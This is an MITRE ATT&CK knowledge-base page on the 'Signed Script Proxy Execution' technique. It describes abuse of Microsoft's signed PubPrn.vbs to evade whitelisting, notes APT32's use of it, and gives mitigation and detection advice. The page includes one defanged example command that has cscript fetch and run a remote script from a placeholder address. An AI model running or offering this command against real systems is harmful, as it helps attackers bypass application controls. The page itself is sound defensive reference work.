Register to stream ATT&CKcon 2.0 October 29-30

Signed Script Proxy Execution

Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.

PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. [1] Example command: cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png

There are several other signed scripts that may be used in a similar manner. [2]

ID: T1216
Tactic: Defense Evasion, Execution
Platform: Windows
Permissions Required: User
Data Sources: Process monitoring, Process command-line parameters
Defense Bypassed: Application whitelisting, Digital Certificate Validation
Contributors: Praetorian
Version: 1.0

Procedure Examples

Name Description
APT32 APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses. [3]

Mitigations

Mitigation Description
Execution Prevention Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.

Detection

Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.

References